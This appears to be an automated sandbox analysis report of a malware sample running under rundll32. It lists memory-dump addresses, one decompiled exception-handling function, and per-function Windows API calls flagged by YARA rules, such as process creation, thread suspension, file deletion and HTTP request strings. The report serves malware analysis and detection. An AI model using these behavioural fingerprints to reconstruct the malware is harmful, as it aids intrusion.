                                            0x049f8491
                                            0x049f8493
                                            0x049f8496
                                            0x00000000
                                            0x00000000
                                            0x049f8498
                                            0x049f849a
                                            0x049f8500
                                            0x049f8500
                                            0x049f865e
                                            0x00000000
                                            0x049f865e
                                            0x049f849c
                                            0x049f849c
                                            0x049f84a0
                                            0x049f84a2
                                            0x049f84a2
                                            0x049f84a2
                                            0x049f84a2
                                            0x049f84a5
                                            0x049f84a6
                                            0x049f84a9
                                            0x049f84a9
                                            0x049f84ad
                                            0x049f84b1
                                            0x049f84bf
                                            0x049f84bf
                                            0x049f84c7
                                            0x049f84cd
                                            0x049f84cf
                                            0x049f84d1
                                            0x049f84e1
                                            0x049f84ee
                                            0x049f84f2
                                            0x049f84f7
                                            0x049f84f9
                                            0x049f8577
                                            0x049f8577
                                            0x049f84fb
                                            0x049f84fb
                                            0x049f84fb
                                            0x049f8579
                                            0x049f857b
                                            0x049f865c
                                            0x049f865c
                                            0x00000000
                                            0x049f8581
                                            0x049f8581
                                            0x049f8588
                                            0x00000000
                                            0x00000000
                                            0x049f858e
                                            0x049f8592
                                            0x049f85ee
                                            0x049f85f0
                                            0x049f85f8
                                            0x049f85fa
                                            0x049f85fc
                                            0x00000000
                                            0x00000000
                                            0x049f85fe
                                            0x049f8604
                                            0x049f8606
                                            0x049f8608
                                            0x049f861d
                                            0x049f861d
                                            0x049f861f
                                            0x049f864e
                                            0x049f8655
                                            0x00000000
                                            0x049f8655
                                            0x049f8623
                                            0x049f8624
                                            0x049f8626
                                            0x049f8628
                                            0x049f8628
                                            0x049f862a
                                            0x049f862c
                                            0x049f862e
                                            0x049f8642
                                            0x049f8642
                                            0x049f8645
                                            0x049f8647
                                            0x049f8647
                                            0x049f8648
                                            0x049f8648
                                            0x00000000
                                            0x049f8630
                                            0x049f8630
                                            0x049f8630
                                            0x049f8639
                                            0x049f863a
                                            0x049f863c
                                            0x049f863e
                                            0x049f863e
                                            0x00000000
                                            0x049f8630
                                            0x049f862e
                                            0x049f860a
                                            0x049f8611
                                            0x049f8611
                                            0x049f8613
                                            0x00000000
                                            0x00000000
                                            0x049f8615
                                            0x049f8616
                                            0x049f8619
                                            0x049f861b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f861b
                                            0x00000000
                                            0x049f8611
                                            0x049f8594
                                            0x049f8597
                                            0x049f859c
                                            0x00000000
                                            0x00000000
                                            0x049f85a5
                                            0x049f85a7
                                            0x049f85ad
                                            0x00000000
                                            0x00000000
                                            0x049f85b3
                                            0x049f85b9
                                            0x00000000
                                            0x00000000
                                            0x049f85bf
                                            0x049f85c1
                                            0x049f85ca
                                            0x049f85ce
                                            0x00000000
                                            0x00000000
                                            0x049f85d4
                                            0x049f85d7
                                            0x049f85d9
                                            0x00000000
                                            0x00000000
                                            0x049f85e0
                                            0x049f85e2
                                            0x00000000
                                            0x00000000
                                            0x049f85e4
                                            0x049f85e8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f85e8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f84d3
                                            0x049f84d3
                                            0x049f84d3
                                            0x049f84da
                                            0x00000000
                                            0x00000000
                                            0x049f84dc
                                            0x049f84dd
                                            0x049f84df
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f84df
                                            0x049f8507
                                            0x049f8509
                                            0x00000000
                                            0x00000000
                                            0x049f8519
                                            0x049f851b
                                            0x049f851d
                                            0x00000000
                                            0x00000000
                                            0x049f8523
                                            0x049f852a
                                            0x049f8556
                                            0x049f8556
                                            0x049f8558
                                            0x049f855a
                                            0x049f856e
                                            0x049f8570
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f855c
                                            0x049f855c
                                            0x049f855c
                                            0x049f8565
                                            0x049f8566
                                            0x049f8568
                                            0x049f856a
                                            0x049f856a
                                            0x00000000
                                            0x049f855c
                                            0x049f852c
                                            0x049f852c
                                            0x049f852f
                                            0x049f8531
                                            0x049f8543
                                            0x049f8543
                                            0x049f8546
                                            0x049f8548
                                            0x049f8548
                                            0x049f8549
                                            0x049f8549
                                            0x049f854f
                                            0x049f854f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f8533
                                            0x049f8533
                                            0x049f8533
                                            0x049f853a
                                            0x00000000
                                            0x00000000
                                            0x049f853c
                                            0x049f853c
                                            0x049f853d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f853d
                                            0x049f853f
                                            0x049f8541
                                            0x049f8554
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f8554
                                            0x00000000
                                            0x049f8541
                                            0x049f84b3
                                            0x049f84b6
                                            0x049f84b9
                                            0x00000000
                                            0x00000000
                                            0x049f84bb
                                            0x049f84bd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x049f84bd
                                            0x049f8482
                                            0x049f8484
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 049F84F2
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: MemoryQueryVirtual
                                            • String ID:
                                            • API String ID: 2850889275-0
                                            • Opcode ID: 215b05fe89e0caa1f03109a7222161707500d84da1910a60222e4b0fbd528bd4
                                            • Instruction ID: e119265f7f448d44f18db81fa42c9bb2b69b23e04ed61867bba3d3bf3b0f4f7e
                                            • Opcode Fuzzy Hash: 215b05fe89e0caa1f03109a7222161707500d84da1910a60222e4b0fbd528bd4
                                            • Instruction Fuzzy Hash: 786118317002129FDBA9EE28CC9062933EAFB85358F248879DB56CB290E775F842C740
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581488B Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 058148FB
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateProcessUser
                                            • String ID:
                                            • API String ID: 2217836671-0
                                            • Opcode ID: 1a75e31db1659823c9ac8ffbf092e6016d2fed7cf4c4fb328e9f03076344a9ae
                                            • Instruction ID: 9b0a2498154e9dcf2f981997d94ca176439abc1ccd03d36ad0f8bda1d2a0d233
                                            • Opcode Fuzzy Hash: 1a75e31db1659823c9ac8ffbf092e6016d2fed7cf4c4fb328e9f03076344a9ae
                                            • Instruction Fuzzy Hash: 7D119032214249AFDF125F99DD01DEA7FAAFF08364B054215FE1992130CB32D871AB94
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058029B2 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 058029CA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorStatus
                                            • String ID:
                                            • API String ID: 1596131371-0
                                            • Opcode ID: ba2a57f9f51b039e294d7d275b36607c353d4c9a7cd8d12a2f1352308fefcdcb
                                            • Instruction ID: 735692547fb757b2c61571c34d1548283b6e99f7347cd50f3419e72ad687f549
                                            • Opcode Fuzzy Hash: ba2a57f9f51b039e294d7d275b36607c353d4c9a7cd8d12a2f1352308fefcdcb
                                            • Instruction Fuzzy Hash: B2C012365052026BDE195751DC29D2A7E11FF50300F04941DB946C1070CA70A490DB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 049F821C Relevance: .1, Instructions: 77COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 71%
                                            			E049F821C(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E049F8387(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E049F8441(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E049F832C(_t55, _t66);
										_t89 = _t66 + 0x10;
										E049F8387(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E049F8423(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                            0x049f8220
                                            0x049f8221
                                            0x049f8222
                                            0x049f8225
                                            0x049f8227
                                            0x049f822a
                                            0x049f822b
                                            0x049f822d
                                            0x049f822e
                                            0x049f822f
                                            0x049f8232
                                            0x049f823c
                                            0x049f82ed
                                            0x049f82f4
                                            0x049f82fd
                                            0x049f8242
                                            0x049f8242
                                            0x049f8248
                                            0x049f824e
                                            0x049f8251
                                            0x049f8254
                                            0x049f8258
                                            0x049f825d
                                            0x049f8262
                                            0x049f82e2
                                            0x00000000
                                            0x049f8264
                                            0x049f8264
                                            0x049f8270
                                            0x049f8272
                                            0x049f82cd
                                            0x049f82cd
                                            0x049f82d3
                                            0x00000000
                                            0x049f8274
                                            0x049f8283
                                            0x049f8285
                                            0x049f8286
                                            0x049f8287
                                            0x049f828a
                                            0x049f828a
                                            0x049f828c
                                            0x00000000
                                            0x049f828e
                                            0x049f828e
                                            0x049f82d8
                                            0x049f8290
                                            0x049f8290
                                            0x049f8294
                                            0x049f829c
                                            0x049f82a1
                                            0x049f82a6
                                            0x049f82b2
                                            0x049f82ba
                                            0x049f82c1
                                            0x049f82c7
                                            0x049f82cb
                                            0x00000000
                                            0x049f82cb
                                            0x049f828e
                                            0x049f828c
                                            0x00000000
                                            0x049f8272
                                            0x049f82e6
                                            0x049f82e6
                                            0x049f82e6
                                            0x049f8262
                                            0x049f8302
                                            0x049f8309

                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                            • Instruction ID: 1cf6711c30a5207b0346daafe93d0d05c77f39079dbf26977bea1e7b0c529937
                                            • Opcode Fuzzy Hash: 4f37e18b72ef76f3e50d9b898edfd48ae2b22ba2880acf1ff50920e361efee75
                                            • Instruction Fuzzy Hash: A121B6729006049FDB50EFA8CC809A7BBA9FF45360B458578DA559B245EB30F915CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058237F4 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                            • Instruction ID: f21dfc5e7a56ded5dab5884c7295d3741dc83ec4c3d990c77b77877d3fc71d24
                                            • Opcode Fuzzy Hash: 1b247f9ab456798328bbce273d756eab87a009a6d6090662f68ee87ccfb315f2
                                            • Instruction Fuzzy Hash: B1212472A00218AFCB10DF68C890867BFA5BF44310B058868DC06CB245DB34FD55CBE0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05821D04 Relevance: 54.5, APIs: 36, Instructions: 457synchronizationtimethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0581B138: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0581B16C
                                              • Part of subcall function 0581B138: GetLastError.KERNEL32 ref: 0581B22D
                                              • Part of subcall function 0581B138: ReleaseMutex.KERNEL32(00000000), ref: 0581B236
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05821DA2
                                              • Part of subcall function 058047FF: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 05804819
                                              • Part of subcall function 058047FF: CreateWaitableTimerA.KERNEL32(05829208,?,?), ref: 05804836
                                              • Part of subcall function 058047FF: GetLastError.KERNEL32(?,?), ref: 05804847
                                              • Part of subcall function 058047FF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 05804887
                                              • Part of subcall function 058047FF: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 058048A6
                                              • Part of subcall function 058047FF: HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 058048BC
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 05821E05
                                            • StrChrA.SHLWAPI(00000000,0000007C,00000040,00000000,00000000,00000000), ref: 05821E81
                                            • StrTrimA.SHLWAPI(00000000,?), ref: 05821EA3
                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 05821EE3
                                              • Part of subcall function 0581EBC8: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 0581EBEA
                                              • Part of subcall function 0581EBC8: HeapFree.KERNEL32(00000000,00000000,00000038,00000000,00000000,?), ref: 0581EC18
                                            • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 05821F89
                                            • CloseHandle.KERNEL32(?), ref: 05822218
                                              • Part of subcall function 05812D5C: WaitForSingleObject.KERNEL32(?,00000000), ref: 05812D68
                                              • Part of subcall function 05812D5C: HeapFree.KERNEL32(00000000,?,?), ref: 05812D96
                                              • Part of subcall function 05812D5C: ResetEvent.KERNEL32(?,?), ref: 05812DB0
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05821FBE
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05821FCD
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 05821FFA
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05822014
                                            • _allmul.NTDLL(0000003C,00000000,FF676980,000000FF), ref: 0582205C
                                            • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,0000003C,00000000,FF676980,000000FF), ref: 05822076
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0582208C
                                            • ReleaseMutex.KERNEL32(?), ref: 058220A9
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058220BA
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058220C9
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 058220FD
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 05822117
                                            • SwitchToThread.KERNEL32 ref: 05822119
                                            • ReleaseMutex.KERNEL32(?), ref: 05822123
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 05822161
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 0582216C
                                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 0582218F
                                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF), ref: 058221A9
                                            • SwitchToThread.KERNEL32 ref: 058221AB
                                            • ReleaseMutex.KERNEL32(?), ref: 058221B5
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058221CA
                                            • CloseHandle.KERNEL32(?), ref: 0582222C
                                            • CloseHandle.KERNEL32(?), ref: 05822238
                                            • CloseHandle.KERNEL32(?), ref: 05822244
                                            • CloseHandle.KERNEL32(?), ref: 05822250
                                            • CloseHandle.KERNEL32(?), ref: 0582225C
                                            • CloseHandle.KERNEL32(?), ref: 05822268
                                            • CloseHandle.KERNEL32(?), ref: 05822274
                                            • RtlExitUserThread.NTDLL(00000000), ref: 05822283
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CloseHandleObjectSingle$TimerWaitable$MultipleObjects$HeapMutexRelease_allmul$FreeThread$CreateErrorEventLastSwitchTime$AllocateExitFileOpenResetSystemTrimUser
                                            • String ID:
                                            • API String ID: 2369282788-0
                                            • Opcode ID: d3e0aa4664b8e1b1a562bae47296943738cf5aa70a9bfde1fa5aa2952c30b912
                                            • Instruction ID: adfa0546b90da721996e6428b99e6765b7d4b664fba6ef8786a44b64afbf364f
                                            • Opcode Fuzzy Hash: d3e0aa4664b8e1b1a562bae47296943738cf5aa70a9bfde1fa5aa2952c30b912
                                            • Instruction Fuzzy Hash: 0FF18171518315AFDB20AF69CC8596ABFE9FB44354F004A29FD96D21A0DB31AC84CF53
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581984F Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 314synchronizationmemorythreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 05819876
                                            • memcpy.NTDLL(?,?,00000010), ref: 05819899
                                            • memset.NTDLL ref: 058198E5
                                            • lstrcpyn.KERNEL32(?,?,00000034), ref: 058198F9
                                            • GetLastError.KERNEL32 ref: 05819927
                                            • GetLastError.KERNEL32 ref: 0581996E
                                            • GetLastError.KERNEL32 ref: 0581998D
                                            • WaitForSingleObject.KERNEL32(?,000927C0), ref: 058199C7
                                            • WaitForSingleObject.KERNEL32(?,00000000), ref: 058199D5
                                            • GetLastError.KERNEL32 ref: 05819A4F
                                            • ReleaseMutex.KERNEL32(?), ref: 05819A61
                                            • RtlExitUserThread.NTDLL(?), ref: 05819A77
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05819AA0
                                            • RtlEnterCriticalSection.NTDLL(00000000), ref: 05819ABD
                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000010), ref: 05819B0D
                                            • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,00000010), ref: 05819B17
                                            • GetLastError.KERNEL32 ref: 05819B21
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 05819B32
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,00000010), ref: 05819B54
                                            • HeapFree.KERNEL32(00000000,?), ref: 05819B8B
                                            • RtlLeaveCriticalSection.NTDLL(00000000), ref: 05819B9F
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,00000010), ref: 05819BA8
                                            • SuspendThread.KERNEL32(?), ref: 05819BB7
                                            • CreateEventA.KERNEL32(05829208,00000001,00000000), ref: 05819BCB
                                            • SetEvent.KERNEL32(00000000), ref: 05819BD8
                                            • CloseHandle.KERNEL32(00000000), ref: 05819BDF
                                            • Sleep.KERNEL32(000001F4), ref: 05819BF2
                                            • ResumeThread.KERNEL32(?), ref: 05819C16
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorLast$CloseFreeHeapObjectSingleThreadWait$CriticalEventHandleSection$CreateDeleteEnterExitFileLeaveMutexOpenReleaseResumeSleepSuspendUserlstrcpynmemcpymemset
                                            • String ID: v
                                            • API String ID: 4191902400-1801730948
                                            • Opcode ID: 211462847c8e004a0496096e3df86c36bb9350f37db9ac39f88393b9e1b391f0
                                            • Instruction ID: 4e0a9d126a5fd68d664bf79ba54d973cb4a588ac95a8ae1008d96c8f61a6d28d
                                            • Opcode Fuzzy Hash: 211462847c8e004a0496096e3df86c36bb9350f37db9ac39f88393b9e1b391f0
                                            • Instruction Fuzzy Hash: 37B16A72A14305AFDB20AF65D88996ABFBDFB84310F008929FD56D2150DB70A984CF66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580AA84 Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0580AAA5
                                            • GetTickCount.KERNEL32 ref: 0580AABF
                                            • wsprintfA.USER32 ref: 0580AB12
                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 0580AB1E
                                            • QueryPerformanceCounter.KERNEL32(?), ref: 0580AB29
                                            • _aulldiv.NTDLL(?,?,?,?), ref: 0580AB3F
                                            • wsprintfA.USER32 ref: 0580AB55
                                            • wsprintfA.USER32 ref: 0580AB7A
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580AB8D
                                            • wsprintfA.USER32 ref: 0580ABB1
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580ABC4
                                            • wsprintfA.USER32 ref: 0580ABFE
                                            • wsprintfA.USER32 ref: 0580AC22
                                            • lstrcat.KERNEL32(?,?), ref: 0580AC5A
                                              • Part of subcall function 0581A670: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,0580D3E9,?,?), ref: 0581A730
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0580AC74
                                            • GetTickCount.KERNEL32 ref: 0580AC84
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 0580AC98
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 0580ACB6
                                            • StrTrimA.SHLWAPI(00000000,058243E8,00000000,05D7C310), ref: 0580ACEF
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580AD11
                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0580AD18
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580AD1F
                                            • lstrcat.KERNEL32(00000000,?), ref: 0580AD26
                                            • HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0580ADA0
                                            • HeapFree.KERNEL32(00000000,?,00000000), ref: 0580ADB2
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,05D7C310), ref: 0580ADC1
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580ADD3
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580ADE5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
                                            • String ID:
                                            • API String ID: 3322690043-0
                                            • Opcode ID: db4d4ce5be47514417405c08878d7034dabf622ad6deae36eceb67f804bb77d9
                                            • Instruction ID: d8472a9e231ae920bff0978edff17d96c7d81fb5816e20c43ce866918b6ffd55
                                            • Opcode Fuzzy Hash: db4d4ce5be47514417405c08878d7034dabf622ad6deae36eceb67f804bb77d9
                                            • Instruction Fuzzy Hash: B2A15B71614305AFDB61DFA8EC89E6A7FE9FB48210F048415FD09C22A0DB35E895CF66
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581D059 Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?,?,05829190), ref: 0581D0BB
                                            • RtlAllocateHeap.NTDLL(00000000,05828AA9,?), ref: 0581D157
                                            • lstrcpyn.KERNEL32(00000000,?,05828AA9,?,05829190), ref: 0581D16C
                                            • HeapFree.KERNEL32(00000000,00000000,?,05829190), ref: 0581D187
                                            • StrChrA.SHLWAPI(?,00000020,05828AA8,?,?,05829190), ref: 0581D26E
                                            • StrChrA.SHLWAPI(00000001,00000020,?,05829190), ref: 0581D27F
                                            • lstrlen.KERNEL32(00000000,?,05829190), ref: 0581D293
                                            • memmove.NTDLL(05828AA9,?,00000001,?,05829190), ref: 0581D2A3
                                            • lstrlen.KERNEL32(?,05828AA8,?,?,05829190), ref: 0581D2CF
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0581D2F5
                                            • memcpy.NTDLL(00000000,?,?,?,05829190), ref: 0581D309
                                            • memcpy.NTDLL(05828AA8,?,?,?,05829190), ref: 0581D329
                                            • HeapFree.KERNEL32(00000000,05828AA8,?,?,?,?,?,?,?,?,05829190), ref: 0581D365
                                            • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0581D42B
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 0581D473
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                            • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                            • API String ID: 3227826163-647159250
                                            • Opcode ID: e82551fd4665712758e4a009c81b59df82aeed678a878b206ca81e151fc838cc
                                            • Instruction ID: 4f4dcd9c3685de761e211151fbde98a58983dbfa1c87c9ace0b0be8ed6f0c513
                                            • Opcode Fuzzy Hash: e82551fd4665712758e4a009c81b59df82aeed678a878b206ca81e151fc838cc
                                            • Instruction Fuzzy Hash: 24E12571A01209AFDB25DFA8C889BAABBB9FF04310F148559FD16EB250DB30ED51CB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580814A Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL ref: 0580817E
                                            • wsprintfA.USER32 ref: 058081E8
                                            • wsprintfA.USER32 ref: 0580822E
                                            • wsprintfA.USER32 ref: 0580824F
                                            • lstrcat.KERNEL32(00000000,?), ref: 05808286
                                            • wsprintfA.USER32 ref: 058082A7
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058082C1
                                            • wsprintfA.USER32 ref: 058082E8
                                            • HeapFree.KERNEL32(00000000,?), ref: 058082FD
                                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 05808317
                                            • RtlEnterCriticalSection.NTDLL(05D7C2D0), ref: 05808338
                                            • RtlLeaveCriticalSection.NTDLL(05D7C2D0), ref: 05808352
